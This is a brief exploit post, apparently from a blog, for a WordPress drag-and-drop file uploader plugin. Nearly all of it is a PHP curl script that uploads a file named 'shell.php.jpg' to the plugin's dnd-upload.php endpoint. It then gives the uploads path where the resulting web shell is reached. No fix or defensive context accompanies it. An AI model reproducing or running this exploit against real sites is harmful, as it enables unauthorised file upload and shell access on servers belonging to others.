###########################################################
Vuln page : http://mysite.com/wp-content/plugins/drag-drop-file-uploader/dnd-upload.php
exploit :
<?php
$u=”shell.php.jpg”;
$c = curl_init(“http://127.0.0.1/wp/wp-content/plugins/drag-drop-file-uploader/dnd-upload.php”);
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array(‘file’=>”@$u”));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e;
?>
Shell access : http://mysite.com/wp-content/uploads/[YYYY]/[MM]/shell.php.jpg
#####################################################################
评论关闭。